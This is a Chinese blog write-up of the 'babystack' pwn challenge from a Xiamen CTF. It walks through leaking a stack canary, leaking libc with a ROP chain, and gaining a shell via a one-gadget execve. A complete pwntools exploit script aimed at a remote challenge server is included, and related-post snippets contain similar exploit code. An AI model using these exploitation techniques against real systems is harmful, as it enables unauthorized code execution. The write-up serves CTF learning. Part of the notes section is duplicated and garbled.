pwn1-厦门邀请赛

最新推荐文章于 2023-09-15 22:25:22 发布
最新推荐文章于 2023-09-15 22:25:22 发布
阅读量259 收藏
点赞数 1
文章标签: python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55906008/article/details/128119177
版权

pwn1-厦门邀请赛

一、分析文件

image-20221125052453615

该文件为64位,开启canary保护,开启数据执行保护

canary:泄露canary的值绕过保护

NX:数据执行保护, 系统把需要写入数据的内存标识为可写,把保存指令的内存标识为可执行,但是不会有一块内存被同时表示为可写和可执行的。构造ROP链。

二、ida大法查看文件伪代码

image-20221125053335020

分析

  1. 可见s处申请0x80内存,但在24行读入0x100的数据,造成栈溢出。

  2. 19行处有puts函数可以泄露canary的值

  3. canary位于ebp+8h处

三、确定文件行为

image-20221125053941243

四、构造exp

(一)泄露canary的值


payload = 0x88 * b'a'
p.sendlineafter('>> ','1')
p.sendline(payload)
p.sendlineafter('>> ','2')
p.recvuntil('a\n')
canary = u64(p.recv(7).rjust(8,b'\x00'))
print(hex(canary))

(二)获取libc的加载地址

查看main函数地址:

image-20221125055241290

查看pop rdi gadget地址:

image-20221125055350596

64位文件采用寄存器传参!

泄露put实际地址
payload = 0x88 * b'a' + p64(canary) + b'a' * 8 + p64(prdi_addr) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
p.sendlineafter('>> ','1')
p.sendline(payload)
p.sendlineafter('>> ','3')
real_puts = u64(p.recv(6).ljust(8,b'\x00'))

(三)构造最终payload获取shell

#coding = UTF-8
from pwn import *
p = remote( '61.147.171.105', 54040)
context.log_level = 'debug'

elf = ELF('./babystack')
libc = ELF('./libc-2.23.so')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_addr = 0x400908
prdi_addr = 0x400a93

payload = 0x88 * b'a'
p.sendlineafter('>> ','1')
p.sendline(payload)
p.sendlineafter('>> ','2')
p.recvuntil('a\n')
canary = u64(p.recv(7).rjust(8,b'\x00'))
print(hex(canary))

##3
payload = 0x88 * b'a' + p64(canary) + b'a' * 8 + p64(prdi_addr) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
p.sendlineafter('>> ','1')
p.sendline(payload)
p.sendlineafter('>> ','3')
real_puts = u64(p.recv(6).ljust(8,b'\x00'))



libc_base = real_puts - libc.symbols['puts']
execve = libc_base + 0x45216
###

print('execve=',execve)

payload = b'A' * 0x88  + p64(canary) + b'B' * 8 + p64(execve)
p.sendlineafter('>> ','1')
p.sendline(payload)
p.sendlineafter('>> ','3')
p.interactive()

获得shell,拿到flagimage-20221125101610662

注意点:

  1. 在调试过程中,错把p.sendlineafter(‘>> ‘,‘1’) 写为p.sendlineafter(’>>’,‘1’)导致exp失效
    存中…(img-gQaCv3jv-1669801009198)]

注意点:

  1. 在调试过程中,错把p.sendlineafter(‘>> ‘,‘1’) 写为p.sendlineafter(’>>’,‘1’)导致exp失效
  2. 函数调用采用plt表中的地址或者symblo
魔瞳。
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
xman 厦门邀请赛 pwn1 babystack writeup
qq_39596232的博客
09-07 522
题目描述: 这个题目针对现在的我还是有点难度的,花费了我三天的时间,最后发现原因竟是因为字符转化为整型的过程中多加了好多0. 分析思路: 1、首先查看文件的详细信息: tucker@ubuntu:~/xman/pwn/pwn1$ file babystack babystack: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), d...
(攻防世界)(pwnpwn1(厦门邀请赛)babystack
PLpa的博客
07-21 2532
canary!canary!canary! 拿到题目,下载附件,查看保护。 可以很清楚的看到,程序开了canary,这就说明我们不能实现暴力的栈溢出,还要考虑这个canary的值。 我们首先运行一下程序: 可以很清楚的看出程序的功能,当我们选择1时,我们就可以输入,当我们选择2时,我们可以输出我们前面输入的东西。 进入IDA看源代码: 我们可以看到canary的值存放在v6里,v6距离rbp...
pwn1
WYJ____的博客
05-10 1081
ls 列出文件和目录。 ls -l 列出文件的详细信息。 cat flag 显示文件flag的内容。
pwn1第一关
qq_18823653的博客
03-28 460
检查程序,发现是32位,开了NX保护 拖入ida32 get()存在溢出,gdb调试 偏移112字节后覆盖返回地址,程序本身有调用system函数, exp如下: from pwn import * p=process('./pwn1') payload='a'*112+p32(0x0804863A) p.recvline() p.sendline(payload) p.interactive(...
CTF中关于pwn题如何加载目标libc的方法
weixin_30345577的博客
09-20 757
问题:在做pwn题的过程中,我们经常会遇到题目提供libc,但是本地调试的时候加载的是本地libc。 解决方法: 方法1: 可以用添加环境变量的方法,如下:    export LD_LIBRARY_PATH=`pwd` #当前目录为加载目录export LD_PRELOAD=你的libc #加载本地pwn题目下的libc 最后不用了在:unset LD_PRELOAD #调...
理解got和plt
zhangmiaoping23的专栏
09-10 2290
共享库是现代操作系统的一个重要组成部分,但是我们对它背后的实现知之甚少。当然,很多文档从各个角度对动态库进行过介绍。希望我的这边文章能给对动态库的理解带来一种新的理解。 让我们以此开始——在elf格式中,重定位记录是一些允许我们稍后填写的二进制信息——链接阶段由编译工具填充或者在运行时刻由动态连接器填写。一个二进制的重定位记录从本质上说就是“确定符号X的值,然后把这个值放入二进制文件中的偏移量为Y...
把共享库(SO)加载到指定的内存地址
jinghuainfo
07-01 270
把共享库(SO)加载到指定的内存地址 转载时请注明出处:http://blog.csdn.net/absurd 一位朋友最近遇到一个棘手的问题,希望把共享库(SO)加载到指定的内存地址,目的可能是想通过prelink来加快应用程序的起动速度。他问我有没有什么方法。我知道Windows下是可以的,比如在VC6里设置/base的值就行了,所以相信在linux下也是可行的。 VC有编译...
[LINUX]指定需要加载的动态库位置
小蜗牛之家
08-13 272
linux中有时候期望程序加载自己编译的动态库,而不是系统自带的库。 设置LD_LIBRARY_PATH无法解决,因为查找系统路径先于LD_LIBRARY_PATH设置的路径; 可以设置LD_PRELOAD环境变量,直接指定so的全路径。 LD_PRELOAD=/home/me/selfdefined/libc++.so ./binary ...
PWN学习】如何获取libc基址
Morphy_Amo的博客
12-09 8005
在解pwn题的时候,如果程序中没有可以获得shell的函数,通常会通过got表中调用函数来获取libc基址,然后通过libc获取要用的system函数和binsh字符。
easycms v5.5 分析 | Bugku S3 AWD排位赛
最新发布
qq_56313338的博客
09-15 1080
bugku awd中的cmseasy 5.5代码审计,分析路由规则,sql注入分析,不登陆进行文件上传getshell
BugKu 2021 CTF AWD 排位赛 真题 S2 AWD排位赛-7.zip
12-07
BugKu 2021 CTF AWD 排位赛 真题
Bugku S3 AWD排位赛-2 pwn
z1r0的博客
08-13 592
可以通过s溢出改掉v5,满足条件即可。
bugku PHP_encrypt_1(ISCCCTF)
小白渣的博客
09-15 600
PHP_encrypt_1(ISCCCTF) 别说了感觉巨难 用到了密码学和MD5加解密 只能搬照大佬的wirteup 了 给出了一个 encrypt 函数和一串密文
Bugku S3 AWD排位赛-5 pwn
z1r0的博客
09-24 1030
修漏洞这里笔者直接把execve(“/bin/sh”, 0LL, 0LL);改成execve(0, 0LL, 0LL);,但转念一想,gets这个漏洞大部分人都不会修,所以笔者就直接写了第二份exp,也就是ret2libc。结果不出所料,有些队只会修execv,但是不会修gets,所以成功打到全场。栈溢出,直接ret2text。
pwn 暑假复习三 libc泄露
SsMing的博客
07-15 7380
ctfwiki例一:ret2libc2拿到程序checksec查看:没什么问题源码int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [sp+1Ch] [bp-64h]@1 setvbuf(stdout, 0, 2, 0); setvbuf(stdin, 0, 1, 0); p...
pwn更换libc的方法
doudoudedi
08-05 1833
是不是常常为pwn的不同ubuntu环境而困扰 )小声我也是 这里分享一个patchelf的方法 首先下载patchelf然后执行着2条即可以 import os os.system("patchelf --set-interpreter /libc-ld.so/{} ./pwn1").format(your_input)#这里是将链接器准备好 os.system("patchelf --set-rpath /libc-ld.so/{} ./pwn1").format()#这里是将libc文件加载
我的pwn笔记
weixin_30821731的博客
06-12 420
0.64位程序参数一次保存在RDI,RSI,RDX,RCX,R8和 R9,具体见图 windows64位调用约定 1.<_libc_csu_init>有一些万能gadget,汇编如下 #!bash 00000000004005a0 <__libc_csu_init>: 4005a0: 48 89 6c 24 d8 mo...
pwntools加载指定版本libc
weixin_44164182的博客
07-12 3544
关于在Linux中使用其他版本的libc执行二进制程序 1.查看本机libc版本 ldd --version 获取所需目标版本libc,可参考 https://github.com/niklasb/libc-database 2. libc文件和libc-dbg文件 libc.so文件为包含代码的、加载进目标进程地址空间的文件,一般发布时不带调试信息,直接使用这种so文件加载,在pwndbg中使用bin、heap等命令将提示无符号信息。 bins: This command only works w
pwn技巧之ret to libc
这里没人
05-14 2422
简介 在0day攻击当中有许多的技巧,这次介绍一种常用的攻击手段。ret to libc与栈溢出,堆溢出之类的漏洞利用技巧有所不同。ret to libc是一种在漏洞攻击中的常用的思路。目的是最大化利用所发现的漏洞,实现我们最终的目标get shell 首先,我们来认识一个c语言的库函数 int system(const char * string); 这个函数的的功能很简单,执行...
攻防世界pwn-forgot
08-10
pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}} ] [.reference_item] - *2* *3* [攻防世界:PWN刷题-forgot]...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值